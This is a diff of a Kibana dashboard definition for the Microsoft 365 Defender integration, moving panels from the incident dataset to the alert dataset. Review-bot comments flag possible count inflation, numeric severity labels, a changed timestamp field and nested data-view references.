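Review bot: Replacing `unique_count` of the alert id (here the `defaults(unique_count(...), 0)` formula) with `count` over `___records___` changes the metric from distinct alerts to documents, which only agrees if the alert data stream stores exactly one document per alert. Several panels in this dashboard filter on per-evidence fields (`evidence.roles`, `evidence.verdict`), which suggests evidence may be fanned out across documents — if so the new counts inflate, so confirm the cardinality before merging. The same substitution appears in the hunks at `@@ -293,13 +250,16 @@`, `@@ -422,9 +387,12 @@`, `@@ -560,9 +529,12 @@`, `@@ -735,9 +712,12 @@`, `@@ -859,9 +840,12 @@`, `@@ -1022,9 +1026,12 @@`, `@@ -1147,9 +1158,12 @@`, `@@ -1280,13 +1296,16 @@` and `@@ -1599,9 +1623,12 @@`. `\"emptyAsNull\": false` renders an empty result as 0, which appears to be what the removed `defaults(..., 0)` was for.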
@@ -293,13 +250,16 @@ "dataType": "number", "isBucketed": false, "label": "Count", - "operationType": "unique_count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, "scale": "ratio", - "sourceField": "m365_defender.incident.alert.id" + "sourceField": "___records___" }, "91075489-5815-4881-af42-d6e31205b1c5": { "customLabel": true, - "dataType": "string", + "dataType": "number", "isBucketed": true, "label": "Severity", "operationType": "terms", @@ -311,10 +271,14 @@ }, "orderDirection": "desc", "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], "size": 5 }, "scale": "ordinal", - "sourceField": "m365_defender.incident.alert.severity" + "sourceField": "event.severity" } }, "incompleteColumns": {} @@ -331,17 +295,17 @@ "alias": null, "disabled": false, "field": "data_stream.dataset", - "index": "2128586b-14fe-4907-84a9-4c193f8a2c5f", + "index": "a155689d-f319-4f42-831d-2097922e6b7c", "key": "data_stream.dataset", "negate": false, "params": { - "query": "m365_defender.incident" + "query": "m365_defender.alert" }, "type": "phrase" }, "query": { "match_phrase": { - "data_stream.dataset": "m365_defender.incident" + "data_stream.dataset": "m365_defender.alert" } } } @@ -366,7 +330,8 @@ "numberDisplay": "percent", "primaryGroups": [ "91075489-5815-4881-af42-d6e31205b1c5" - ] + ], + "truncateLegend": false } ], "shape": "pie" @@ -387,7 +352,7 @@ "y": 8 }, "panelIndex": "00c0b388-64b8-49c8-9ccb-de8e58030b4d", - "title": "Distribution of Alerts by Severity [Logs Microsoft 365 Defender]", + "title": "Alerts by Severity [Logs Microsoft 365 Defender]", "type": "lens", "version": "8.7.1" }, @@ -402,7 +367,7 @@ }, { "id": "logs-*", - "name": "d7bb4468-3be1-458a-b9e0-bd84db7e308a", + "name": "db899305-b961-454c-8390-5d1d2395a3e2", "type": "index-pattern" } ], 
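Review bot: The Severity terms column now buckets on the numeric `event.severity` (`\"dataType\": \"number\"`), so the pie legend will show numeric codes instead of the `high`/`medium`/`low` values the previous `m365_defender.incident.alert.severity` field carried (the old status queries in this file filter on `\"high\"`); unless a value formatter or a string severity field from the alert data stream is used, readers need the code mapping to interpret the chart. The same switch is made in the hunk at `@@ -1297,11 +1316,15 @@` for the over-time breakdown. The custom `\"label\": \"Severity\"` remains accurate either way.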
@@ -422,9 +387,12 @@ "dataType": "number", "isBucketed": false, "label": "Count", - "operationType": "unique_count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, "scale": "ratio", - "sourceField": "m365_defender.incident.alert.id" + "sourceField": "___records___" }, "ccf17a24-dc07-4800-983f-8c507665a6a0": { "customLabel": true, @@ -460,17 +428,17 @@ "alias": null, "disabled": false, "field": "data_stream.dataset", - "index": "d7bb4468-3be1-458a-b9e0-bd84db7e308a", + "index": "db899305-b961-454c-8390-5d1d2395a3e2", "key": "data_stream.dataset", "negate": false, "params": { - "query": "m365_defender.incident" + "query": "m365_defender.alert" }, "type": "phrase" }, "query": { "match_phrase": { - "data_stream.dataset": "m365_defender.incident" + "data_stream.dataset": "m365_defender.alert" } } } @@ -495,9 +463,10 @@ } ], "legend": { - "isVisible": true, + "isVisible": false, "legendSize": "auto", - "position": "right" + "position": "right", + "showSingleSeries": false }, "preferredSeriesType": "bar_stacked", "title": "Empty XY chart", @@ -525,7 +494,7 @@ "y": 8 }, "panelIndex": "8e4019a0-6594-4eaf-9358-c343b72aba84", - "title": "Distribution of Alerts by Category [Logs Microsoft 365 Defender]", + "title": "Alerts by Category [Logs Microsoft 365 Defender]", "type": "lens", "version": "8.7.1" }, @@ -540,7 +509,7 @@ }, { "id": "logs-*", - "name": "57b64179-81e7-4d61-b50b-23d21323b9da", + "name": "d3ac725d-8f46-4c0d-a938-280f91905f74", "type": "index-pattern" } ], @@ -560,9 +529,12 @@ "dataType": "number", "isBucketed": false, "label": "Count", - "operationType": "unique_count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, "scale": "ratio", - "sourceField": "m365_defender.incident.alert.id" + "sourceField": "___records___" }, "fe4ba4cc-3a4f-4dbf-b79d-a3b6550f08b6": { "customLabel": true, 
@@ -578,10 +550,14 @@ }, "orderDirection": "desc", "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], "size": 10 }, "scale": "ordinal", - "sourceField": "m365_defender.incident.alert.determination" + "sourceField": "m365_defender.alert.determination" } }, "incompleteColumns": {} @@ -598,17 +574,17 @@ "alias": null, "disabled": false, "field": "data_stream.dataset", - "index": "57b64179-81e7-4d61-b50b-23d21323b9da", + "index": "d3ac725d-8f46-4c0d-a938-280f91905f74", "key": "data_stream.dataset", "negate": false, "params": { - "query": "m365_defender.incident" + "query": "m365_defender.alert" }, "type": "phrase" }, "query": { "match_phrase": { - "data_stream.dataset": "m365_defender.incident" + "data_stream.dataset": "m365_defender.alert" } } } @@ -647,9 +623,10 @@ } ], "legend": { - "isVisible": true, + "isVisible": false, "legendSize": "auto", - "position": "right" + "position": "right", + "showSingleSeries": false }, "preferredSeriesType": "bar_stacked", "tickLabelsVisibilitySettings": { @@ -681,7 +658,7 @@ "y": 8 }, "panelIndex": "1f836fdc-61f4-4cf4-a392-50276a2b77f1", - "title": "Distribution of Alerts by Determination [Logs Microsoft 365 Defender]", + "title": "Alerts by Determination [Logs Microsoft 365 Defender]", "type": "lens", "version": "8.7.1" }, @@ -696,7 +673,7 @@ }, { "id": "logs-*", - "name": "a06ad11b-3d3e-48e1-bb6c-08f62f8b0b58", + "name": "f7a464e2-0eb1-4f4a-9d10-a16d8f69348c", "type": "index-pattern" } ], @@ -735,9 +712,12 @@ "dataType": "number", "isBucketed": false, "label": "Count", - "operationType": "unique_count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, "scale": "ratio", - "sourceField": "m365_defender.incident.alert.id" + "sourceField": "___records___" } }, "incompleteColumns": {} 
@@ -754,17 +734,17 @@ "alias": null, "disabled": false, "field": "data_stream.dataset", - "index": "a06ad11b-3d3e-48e1-bb6c-08f62f8b0b58", + "index": "f7a464e2-0eb1-4f4a-9d10-a16d8f69348c", "key": "data_stream.dataset", "negate": false, "params": { - "query": "m365_defender.incident" + "query": "m365_defender.alert" }, "type": "phrase" }, "query": { "match_phrase": { - "data_stream.dataset": "m365_defender.incident" + "data_stream.dataset": "m365_defender.alert" } } } @@ -789,9 +769,10 @@ } ], "legend": { - "isVisible": true, + "isVisible": false, "legendSize": "auto", - "position": "right" + "position": "right", + "showSingleSeries": false }, "preferredSeriesType": "bar_stacked", "title": "Empty XY chart", @@ -819,7 +800,7 @@ "y": 31 }, "panelIndex": "b5b7f2a4-1d6e-4812-8724-5a771014c3ae", - "title": "Distribution of Alerts by Service Source [Logs Microsoft 365 Defender]", + "title": "Alerts by Service Source [Logs Microsoft 365 Defender]", "type": "lens", "version": "8.7.1" }, @@ -834,12 +815,12 @@ }, { "id": "logs-*", - "name": "742836c8-3532-4e18-b067-26e3af1b0e3b", + "name": "39ecb368-ff15-47cd-a634-68075279a23e", "type": "index-pattern" }, { "id": "logs-*", - "name": "438f3787-c321-45a5-9cca-89571591b016", + "name": "72677633-892f-44ca-afb3-567a4350bc30", "type": "index-pattern" } ], @@ -859,9 +840,12 @@ "dataType": "number", "isBucketed": false, "label": "Count", - "operationType": "unique_count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, "scale": "ratio", - "sourceField": "m365_defender.incident.alert.id" + "sourceField": "___records___" }, "d8c5d781-6442-4a9f-b91b-8b7b29d8e73a": { "customLabel": true, @@ -877,10 +861,14 @@ }, "orderDirection": "desc", "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], "size": 10 }, "scale": "ordinal", - "sourceField": "m365_defender.incident.alert.evidence.sender_ip" + "sourceField": "m365_defender.alert.evidence.sender_ip" } }, "incompleteColumns": {} 
@@ -896,36 +884,52 @@ "meta": { "alias": null, "disabled": false, - "index": "742836c8-3532-4e18-b067-26e3af1b0e3b", - "key": "m365_defender.incident.alert.evidence.verdict", + "index": "39ecb368-ff15-47cd-a634-68075279a23e", "negate": false, "params": [ - "malicious", - "suspicious" - ], - "type": "phrases", - "value": [ - "malicious", - "suspicious" - ] - }, - "query": { - "bool": { - "minimum_should_match": 1, - "should": [ - { + { + "meta": { + "alias": null, + "disabled": false, + "field": "m365_defender.alert.evidence.verdict", + "index": "logs-*", + "key": "m365_defender.alert.evidence.verdict", + "negate": false, + "params": { + "query": "malicious" + }, + "type": "phrase" + }, + "query": { "match_phrase": { - "m365_defender.incident.alert.evidence.verdict": "malicious" + "m365_defender.alert.evidence.verdict": "malicious" } + } + }, + { + "meta": { + "alias": null, + "disabled": false, + "field": "m365_defender.alert.evidence.verdict", + "index": "logs-*", + "key": "m365_defender.alert.evidence.verdict", + "negate": false, + "params": { + "query": "suspicious" + }, + "type": "phrase" }, - { + "query": { "match_phrase": { - "m365_defender.incident.alert.evidence.verdict": "suspicious" + "m365_defender.alert.evidence.verdict": "suspicious" } } - ] - } - } + } + ], + "relation": "OR", + "type": "combined" + }, + "query": {} }, { "$state": { @@ -935,17 +939,17 @@ "alias": null, "disabled": false, "field": "data_stream.dataset", - "index": "438f3787-c321-45a5-9cca-89571591b016", + "index": "72677633-892f-44ca-afb3-567a4350bc30", "key": "data_stream.dataset", "negate": false, "params": { - "query": "m365_defender.incident" + "query": "m365_defender.alert" }, "type": "phrase" }, "query": { "match_phrase": { - "data_stream.dataset": "m365_defender.incident" + "data_stream.dataset": "m365_defender.alert" } } } 
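Review bot: The two sub-filters inside the new `combined` filter carry a literal `\"index\": \"logs-*\"`, whereas every other filter in this panel, including the outer one (`39ecb368-…`), points at a name in the panel's `references` array; saved-object import resolves data views through that array and does not rewrite literal ids, so confirm the nested sub-filters still bind to the intended data view after the package is installed. The `combined` filter with `\"relation\": \"OR\"` is also a newer filter shape than the `phrases` filter it replaces, so the package's minimum Kibana version constraint should cover it — the panels in this file still declare `\"version\": \"8.7.1\"`.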
@@ -1002,7 +1006,7 @@ }, { "id": "logs-*", - "name": "7a5d204e-cb61-4c0d-8923-28afeb2927a2", + "name": "25f2fb8c-9456-418f-aa6a-d5e4037d63c7", "type": "index-pattern" } ], @@ -1022,9 +1026,12 @@ "dataType": "number", "isBucketed": false, "label": "Count", - "operationType": "unique_count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, "scale": "ratio", - "sourceField": "m365_defender.incident.alert.id" + "sourceField": "___records___" }, "901ba472-02eb-4500-9ead-77371aa87f8c": { "customLabel": true, @@ -1040,10 +1047,14 @@ }, "orderDirection": "desc", "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], "size": 10 }, "scale": "ordinal", - "sourceField": "m365_defender.incident.alert.detection_source" + "sourceField": "m365_defender.alert.detection_source" } }, "incompleteColumns": {} @@ -1060,17 +1071,17 @@ "alias": null, "disabled": false, "field": "data_stream.dataset", - "index": "7a5d204e-cb61-4c0d-8923-28afeb2927a2", + "index": "25f2fb8c-9456-418f-aa6a-d5e4037d63c7", "key": "data_stream.dataset", "negate": false, "params": { - "query": "m365_defender.incident" + "query": "m365_defender.alert" }, "type": "phrase" }, "query": { "match_phrase": { - "data_stream.dataset": "m365_defender.incident" + "data_stream.dataset": "m365_defender.alert" } } } @@ -1127,7 +1138,7 @@ }, { "id": "logs-*", - "name": "be5d6d70-2d76-4b3c-bc34-c27a83b81991", + "name": "5b859903-4472-47cb-8798-06ff556b7753", "type": "index-pattern" } ], @@ -1147,9 +1158,12 @@ "dataType": "number", "isBucketed": false, "label": "Count", - "operationType": "unique_count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, "scale": "ratio", - "sourceField": "m365_defender.incident.alert.id" + "sourceField": "___records___" }, "f65e2e2e-1d06-4965-871e-0c559e325343": { "customLabel": true, 
@@ -1162,7 +1176,7 @@ "interval": "auto" }, "scale": "interval", - "sourceField": "m365_defender.incident.alert.last_update_datetime" + "sourceField": "@timestamp" } }, "incompleteColumns": {} @@ -1179,17 +1193,17 @@ "alias": null, "disabled": false, "field": "data_stream.dataset", - "index": "be5d6d70-2d76-4b3c-bc34-c27a83b81991", + "index": "5b859903-4472-47cb-8798-06ff556b7753", "key": "data_stream.dataset", "negate": false, "params": { - "query": "m365_defender.incident" + "query": "m365_defender.alert" }, "type": "phrase" }, "query": { "match_phrase": { - "data_stream.dataset": "m365_defender.incident" + "data_stream.dataset": "m365_defender.alert" } } } @@ -1216,7 +1230,9 @@ "legend": { "isVisible": true, "legendSize": "auto", - "position": "right" + "position": "right", + "shouldTruncate": false, + "showSingleSeries": false }, "preferredSeriesType": "line", "title": "Empty XY chart", @@ -1244,7 +1260,7 @@ "y": 52 }, "panelIndex": "62846e2a-f412-4cf9-b8ea-b08bc7fbd613", - "title": "Count of Alerts Over Time [Logs Microsoft 365 Defender]", + "title": "Alerts Over Time [Logs Microsoft 365 Defender]", "type": "lens", "version": "8.7.1" }, @@ -1259,7 +1275,7 @@ }, { "id": "logs-*", - "name": "dbc8860d-394c-46cb-a626-67a20c1862c8", + "name": "c9581305-ba3a-4ead-91b7-4535d99f4525", "type": "index-pattern" } ], @@ -1280,13 +1296,16 @@ "dataType": "number", "isBucketed": false, "label": "Count", - "operationType": "unique_count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, "scale": "ratio", - "sourceField": "m365_defender.incident.alert.id" + "sourceField": "___records___" }, "9c52de5e-c802-4a77-8cb4-b60368976cd9": { "customLabel": true, - "dataType": "string", + "dataType": "number", "isBucketed": true, "label": "Severity", "operationType": "terms", 
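Review bot: Switching the date histogram from `m365_defender.incident.alert.last_update_datetime` to `@timestamp` changes what the "Alerts Over Time" line measures — last-update activity before, and now whatever the alert data stream writes into `@timestamp` (creation, update or ingest time; not visible here). The panel title gives no hint of which it is, so either name it in the title or description or confirm the field is the intended one. The same change is in the hunk at `@@ -1314,7 +1337,7 @@`.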
@@ -1297,11 +1316,15 @@ "type": "column" }, "orderDirection": "desc", - "otherBucket": false, - "size": 6 + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 5 }, "scale": "ordinal", - "sourceField": "m365_defender.incident.alert.severity" + "sourceField": "event.severity" }, "e278fc5e-3a46-416d-be86-884554b160dc": { "customLabel": true, @@ -1314,7 +1337,7 @@ "interval": "auto" }, "scale": "interval", - "sourceField": "m365_defender.incident.alert.last_update_datetime" + "sourceField": "@timestamp" } }, "incompleteColumns": {} @@ -1331,17 +1354,17 @@ "alias": null, "disabled": false, "field": "data_stream.dataset", - "index": "dbc8860d-394c-46cb-a626-67a20c1862c8", + "index": "c9581305-ba3a-4ead-91b7-4535d99f4525", "key": "data_stream.dataset", "negate": false, "params": { - "query": "m365_defender.incident" + "query": "m365_defender.alert" }, "type": "phrase" }, "query": { "match_phrase": { - "data_stream.dataset": "m365_defender.incident" + "data_stream.dataset": "m365_defender.alert" } } } @@ -1385,7 +1408,8 @@ "legend": { "isVisible": true, "legendSize": "auto", - "position": "right" + "position": "right", + "shouldTruncate": false }, "preferredSeriesType": "line", "tickLabelsVisibilitySettings": { @@ -1432,7 +1456,7 @@ }, { "id": "logs-*", - "name": "75891f9a-3458-40d6-8d3c-63de61fb3f7d", + "name": "236c3bc5-5f69-4d41-a5cd-c581f069e57e", "type": "index-pattern" } ], @@ -1464,7 +1488,7 @@ "type": "column" }, "orderDirection": "desc", - "otherBucket": true, + "otherBucket": false, "parentFormat": { "id": "terms" }, @@ -1481,7 +1505,7 @@ "label": "Count", "operationType": "count", "params": { - "emptyAsNull": true + "emptyAsNull": false }, "scale": "ratio", "sourceField": "___records___" 
@@ -1505,17 +1529,17 @@ "alias": null, "disabled": false, "field": "data_stream.dataset", - "index": "75891f9a-3458-40d6-8d3c-63de61fb3f7d", + "index": "236c3bc5-5f69-4d41-a5cd-c581f069e57e", "key": "data_stream.dataset", "negate": false, "params": { - "query": "m365_defender.incident" + "query": "m365_defender.alert" }, "type": "phrase" }, "query": { "match_phrase": { - "data_stream.dataset": "m365_defender.incident" + "data_stream.dataset": "m365_defender.alert" } } } @@ -1574,12 +1598,12 @@ }, { "id": "logs-*", - "name": "bfd73a62-e6c5-4126-9065-f4b17a1e4680", + "name": "c17dcd3a-85d8-4d61-8d7d-a73bf33c9308", "type": "index-pattern" }, { "id": "logs-*", - "name": "108199c0-a675-4fe1-87a9-4599aa85db91", + "name": "960f02f3-c9a1-41c3-89b5-e776d368c13f", "type": "index-pattern" } ], @@ -1599,9 +1623,12 @@ "dataType": "number", "isBucketed": false, "label": "Count", - "operationType": "unique_count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, "scale": "ratio", - "sourceField": "m365_defender.incident.alert.id" + "sourceField": "___records___" }, "7048d5d3-a8bc-4b71-8b79-e51c6adc0350": { "customLabel": true, @@ -1617,10 +1644,14 @@ }, "orderDirection": "desc", "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], "size": 10 }, "scale": "ordinal", - "sourceField": "m365_defender.incident.alert.evidence.user_account.account_name" + "sourceField": "m365_defender.alert.evidence.user_account.account_name" } }, "incompleteColumns": {} @@ -1636,8 +1667,9 @@ "meta": { "alias": null, "disabled": false, - "index": "bfd73a62-e6c5-4126-9065-f4b17a1e4680", - "key": "m365_defender.incident.alert.evidence.roles", + "field": "m365_defender.alert.evidence.roles", + "index": "c17dcd3a-85d8-4d61-8d7d-a73bf33c9308", + "key": "m365_defender.alert.evidence.roles", "negate": false, "params": { "query": "compromised" 
@@ -1646,7 +1678,7 @@ }, "query": { "match_phrase": { - "m365_defender.incident.alert.evidence.roles": "compromised" + "m365_defender.alert.evidence.roles": "compromised" } } }, @@ -1658,17 +1690,17 @@ "alias": null, "disabled": false, "field": "data_stream.dataset", - "index": "108199c0-a675-4fe1-87a9-4599aa85db91", + "index": "960f02f3-c9a1-41c3-89b5-e776d368c13f", "key": "data_stream.dataset", "negate": false, "params": { - "query": "m365_defender.incident" + "query": "m365_defender.alert" }, "type": "phrase" }, "query": { "match_phrase": { - "data_stream.dataset": "m365_defender.incident" + "data_stream.dataset": "m365_defender.alert" } } } @@ -1725,12 +1757,12 @@ }, { "id": "logs-*", - "name": "eaea7ed4-6b0d-4522-8e92-34b831024614", + "name": "2ad498dd-ec2d-4d0a-9b28-90ec26463540", "type": "index-pattern" }, { "id": "logs-*", - "name": "8d4d1674-3434-45ae-b1f9-83b5c02ea1b3", + "name": "81318fde-26d0-4216-bad5-1f971638821e", "type": "index-pattern" } ], @@ -1769,9 +1801,12 @@ "dataType": "number", "isBucketed": false, "label": "Count", - "operationType": "unique_count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, "scale": "ratio", - "sourceField": "m365_defender.incident.alert.id" + "sourceField": "___records___" } }, "incompleteColumns": {} 
@@ -1787,36 +1822,52 @@ "meta": { "alias": null, "disabled": false, - "index": "eaea7ed4-6b0d-4522-8e92-34b831024614", - "key": "m365_defender.incident.alert.evidence.verdict", + "index": "2ad498dd-ec2d-4d0a-9b28-90ec26463540", "negate": false, "params": [ - "malicious", - "suspicious" - ], - "type": "phrases", - "value": [ - "malicious", - "suspicious" - ] - }, - "query": { - "bool": { - "minimum_should_match": 1, - "should": [ - { + { + "meta": { + "alias": null, + "disabled": false, + "field": "m365_defender.alert.evidence.verdict", + "index": "logs-*", + "key": "m365_defender.alert.evidence.verdict", + "negate": false, + "params": { + "query": "malicious" + }, + "type": "phrase" + }, + "query": { "match_phrase": { - "m365_defender.incident.alert.evidence.verdict": "malicious" + "m365_defender.alert.evidence.verdict": "malicious" } + } + }, + { + "meta": { + "alias": null, + "disabled": false, + "field": "m365_defender.alert.evidence.verdict", + "index": "logs-*", + "key": "m365_defender.alert.evidence.verdict", + "negate": false, + "params": { + "query": "suspicious" + }, + "type": "phrase" }, - { + "query": { "match_phrase": { - "m365_defender.incident.alert.evidence.verdict": "suspicious" + "m365_defender.alert.evidence.verdict": "suspicious" } } - ] - } - } + } + ], + "relation": "OR", + "type": "combined" + }, + "query": {} }, { "$state": { @@ -1826,17 +1877,17 @@ "alias": null, "disabled": false, "field": "data_stream.dataset", - "index": "8d4d1674-3434-45ae-b1f9-83b5c02ea1b3", + "index": "81318fde-26d0-4216-bad5-1f971638821e", "key": "data_stream.dataset", "negate": false, "params": { - "query": "m365_defender.incident" + "query": "m365_defender.alert" }, "type": "phrase" }, "query": { "match_phrase": { - "data_stream.dataset": "m365_defender.incident" + "data_stream.dataset": "m365_defender.alert" } } } 
@@ -1893,12 +1944,12 @@ }, { "id": "logs-*", - "name": "dd37b426-93bd-4376-8f4d-831cfa0673d8", + "name": "5aaad6ed-4ad5-44ba-8d6f-2835812d4321", "type": "index-pattern" }, { "id": "logs-*", - "name": "5bd954c2-632c-40c9-a72f-47d8ed59a63b", + "name": "fd73d1c0-eb56-41d1-94b0-43976d0ba7d2", "type": "index-pattern" } ], @@ -1937,9 +1988,12 @@ "dataType": "number", "isBucketed": false, "label": "Count", - "operationType": "unique_count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, "scale": "ratio", - "sourceField": "m365_defender.incident.alert.id" + "sourceField": "___records___" } }, "incompleteColumns": {} @@ -1955,8 +2009,9 @@ "meta": { "alias": null, "disabled": false, - "index": "dd37b426-93bd-4376-8f4d-831cfa0673d8", - "key": "m365_defender.incident.alert.evidence.roles", + "field": "m365_defender.alert.evidence.roles", + "index": "5aaad6ed-4ad5-44ba-8d6f-2835812d4321", + "key": "m365_defender.alert.evidence.roles", "negate": false, "params": { "query": "attacked" @@ -1965,7 +2020,7 @@ }, "query": { "match_phrase": { - "m365_defender.incident.alert.evidence.roles": "attacked" + "m365_defender.alert.evidence.roles": "attacked" } } }, @@ -1977,17 +2032,17 @@ "alias": null, "disabled": false, "field": "data_stream.dataset", - "index": "5bd954c2-632c-40c9-a72f-47d8ed59a63b", + "index": "fd73d1c0-eb56-41d1-94b0-43976d0ba7d2", "key": "data_stream.dataset", "negate": false, "params": { - "query": "m365_defender.incident" + "query": "m365_defender.alert" }, "type": "phrase" }, "query": { "match_phrase": { - "data_stream.dataset": "m365_defender.incident" + "data_stream.dataset": "m365_defender.alert" } } } @@ -2038,7 +2093,7 @@ "enhancements": {} }, "gridData": { - "h": 20, + "h": 15, "i": "b83be89c-7f77-406b-9028-1cfb0eb67e8d", "w": 40, "x": 8, 
@@ -2055,7 +2110,7 @@ "version": 1 }, "coreMigrationVersion": "8.7.1", - "created_at": "2023-09-04T08:41:26.216Z", + "created_at": "2024-01-22T12:09:27.346Z", "id": "m365_defender-d80d7840-4366-11ed-b1f2-e917f608bd03", "migrationVersion": { "dashboard": "8.7.0" @@ -2068,7 +2123,7 @@ }, { "id": "logs-*", - "name": "8ed4553a-d396-4ad7-b247-10e005d65086:4dc6b906-d0f7-4c34-b48b-055f291cfc90", + "name": "8ed4553a-d396-4ad7-b247-10e005d65086:9f120d0d-531c-42be-b1ed-5dc4683d5b15", "type": "index-pattern" }, { @@ -2078,7 +2133,7 @@ }, { "id": "logs-*", - "name": "00c0b388-64b8-49c8-9ccb-de8e58030b4d:2128586b-14fe-4907-84a9-4c193f8a2c5f", + "name": "00c0b388-64b8-49c8-9ccb-de8e58030b4d:a155689d-f319-4f42-831d-2097922e6b7c", "type": "index-pattern" }, { @@ -2088,7 +2143,7 @@ }, { "id": "logs-*", - "name": "8e4019a0-6594-4eaf-9358-c343b72aba84:d7bb4468-3be1-458a-b9e0-bd84db7e308a", + "name": "8e4019a0-6594-4eaf-9358-c343b72aba84:db899305-b961-454c-8390-5d1d2395a3e2", "type": "index-pattern" }, { @@ -2098,7 +2153,7 @@ }, { "id": "logs-*", - "name": "1f836fdc-61f4-4cf4-a392-50276a2b77f1:57b64179-81e7-4d61-b50b-23d21323b9da", + "name": "1f836fdc-61f4-4cf4-a392-50276a2b77f1:d3ac725d-8f46-4c0d-a938-280f91905f74", "type": "index-pattern" }, { @@ -2108,7 +2163,7 @@ }, { "id": "logs-*", - "name": "b5b7f2a4-1d6e-4812-8724-5a771014c3ae:a06ad11b-3d3e-48e1-bb6c-08f62f8b0b58", + "name": "b5b7f2a4-1d6e-4812-8724-5a771014c3ae:f7a464e2-0eb1-4f4a-9d10-a16d8f69348c", "type": "index-pattern" }, { @@ -2118,12 +2173,12 @@ }, { "id": "logs-*", - "name": "6847c21e-2ec0-4af4-aa67-ec52b181b05e:742836c8-3532-4e18-b067-26e3af1b0e3b", + "name": "6847c21e-2ec0-4af4-aa67-ec52b181b05e:39ecb368-ff15-47cd-a634-68075279a23e", "type": "index-pattern" }, { "id": "logs-*", - "name": "6847c21e-2ec0-4af4-aa67-ec52b181b05e:438f3787-c321-45a5-9cca-89571591b016", + "name": "6847c21e-2ec0-4af4-aa67-ec52b181b05e:72677633-892f-44ca-afb3-567a4350bc30", "type": "index-pattern" }, { 
@@ -2133,7 +2188,7 @@ }, { "id": "logs-*", - "name": "51f47e38-eed6-42b3-8096-a39b914909da:7a5d204e-cb61-4c0d-8923-28afeb2927a2", + "name": "51f47e38-eed6-42b3-8096-a39b914909da:25f2fb8c-9456-418f-aa6a-d5e4037d63c7", "type": "index-pattern" }, { @@ -2143,7 +2198,7 @@ }, { "id": "logs-*", - "name": "62846e2a-f412-4cf9-b8ea-b08bc7fbd613:be5d6d70-2d76-4b3c-bc34-c27a83b81991", + "name": "62846e2a-f412-4cf9-b8ea-b08bc7fbd613:5b859903-4472-47cb-8798-06ff556b7753", "type": "index-pattern" }, { @@ -2153,7 +2208,7 @@ }, { "id": "logs-*", - "name": "efd3aa63-5879-4383-87e4-6276e38b3c01:dbc8860d-394c-46cb-a626-67a20c1862c8", + "name": "efd3aa63-5879-4383-87e4-6276e38b3c01:c9581305-ba3a-4ead-91b7-4535d99f4525", "type": "index-pattern" }, { @@ -2163,7 +2218,7 @@ }, { "id": "logs-*", - "name": "7317b469-4895-497a-a263-14b58eaec52f:75891f9a-3458-40d6-8d3c-63de61fb3f7d", + "name": "7317b469-4895-497a-a263-14b58eaec52f:236c3bc5-5f69-4d41-a5cd-c581f069e57e", "type": "index-pattern" }, { @@ -2173,12 +2228,12 @@ }, { "id": "logs-*", - "name": "d8b78c44-5d93-4a70-9d3d-0386581082d1:bfd73a62-e6c5-4126-9065-f4b17a1e4680", + "name": "d8b78c44-5d93-4a70-9d3d-0386581082d1:c17dcd3a-85d8-4d61-8d7d-a73bf33c9308", "type": "index-pattern" }, { "id": "logs-*", - "name": "d8b78c44-5d93-4a70-9d3d-0386581082d1:108199c0-a675-4fe1-87a9-4599aa85db91", + "name": "d8b78c44-5d93-4a70-9d3d-0386581082d1:960f02f3-c9a1-41c3-89b5-e776d368c13f", "type": "index-pattern" }, { @@ -2188,12 +2243,12 @@ }, { "id": "logs-*", - "name": "34673480-15c2-4f75-ae86-637bc6875e78:eaea7ed4-6b0d-4522-8e92-34b831024614", + "name": "34673480-15c2-4f75-ae86-637bc6875e78:2ad498dd-ec2d-4d0a-9b28-90ec26463540", "type": "index-pattern" }, { "id": "logs-*", - "name": "34673480-15c2-4f75-ae86-637bc6875e78:8d4d1674-3434-45ae-b1f9-83b5c02ea1b3", + "name": "34673480-15c2-4f75-ae86-637bc6875e78:81318fde-26d0-4216-bad5-1f971638821e", "type": "index-pattern" }, { 
@@ -2203,12 +2258,12 @@ }, { "id": "logs-*", - "name": "664a1613-6c7e-40cd-91b2-43ce6c451ddb:dd37b426-93bd-4376-8f4d-831cfa0673d8", + "name": "664a1613-6c7e-40cd-91b2-43ce6c451ddb:5aaad6ed-4ad5-44ba-8d6f-2835812d4321", "type": "index-pattern" }, { "id": "logs-*", - "name": "664a1613-6c7e-40cd-91b2-43ce6c451ddb:5bd954c2-632c-40c9-a72f-47d8ed59a63b", + "name": "664a1613-6c7e-40cd-91b2-43ce6c451ddb:fd73d1c0-eb56-41d1-94b0-43976d0ba7d2", "type": "index-pattern" }, { @@ -2223,17 +2278,17 @@ }, { "id": "logs-*", - "name": "controlGroup_e61071e0-ba4d-4765-9267-e035395b221f:optionsListDataView", + "name": "controlGroup_ec5d23b5-535c-483a-88ad-279762f3d5ca:optionsListDataView", "type": "index-pattern" }, { "id": "logs-*", - "name": "controlGroup_ec5d23b5-535c-483a-88ad-279762f3d5ca:optionsListDataView", + "name": "controlGroup_cef3df17-225a-4373-a231-caa594cd1bf4:optionsListDataView", "type": "index-pattern" }, { "id": "logs-*", - "name": "controlGroup_cef3df17-225a-4373-a231-caa594cd1bf4:optionsListDataView", + "name": "controlGroup_23cace2f-34ed-4efa-bed4-ccdc7318dfb8:rangeSliderDataView", "type": "index-pattern" } ], diff --git a/packages/m365_defender/kibana/search/m365_defender-989afc60-44a5-11ed-8375-0168a9970c06.json b/packages/m365_defender/kibana/search/m365_defender-989afc60-44a5-11ed-8375-0168a9970c06.json index 1b288286d2f..bbf2717ce1e 100644 --- a/packages/m365_defender/kibana/search/m365_defender-989afc60-44a5-11ed-8375-0168a9970c06.json +++ b/packages/m365_defender/kibana/search/m365_defender-989afc60-44a5-11ed-8375-0168a9970c06.json 
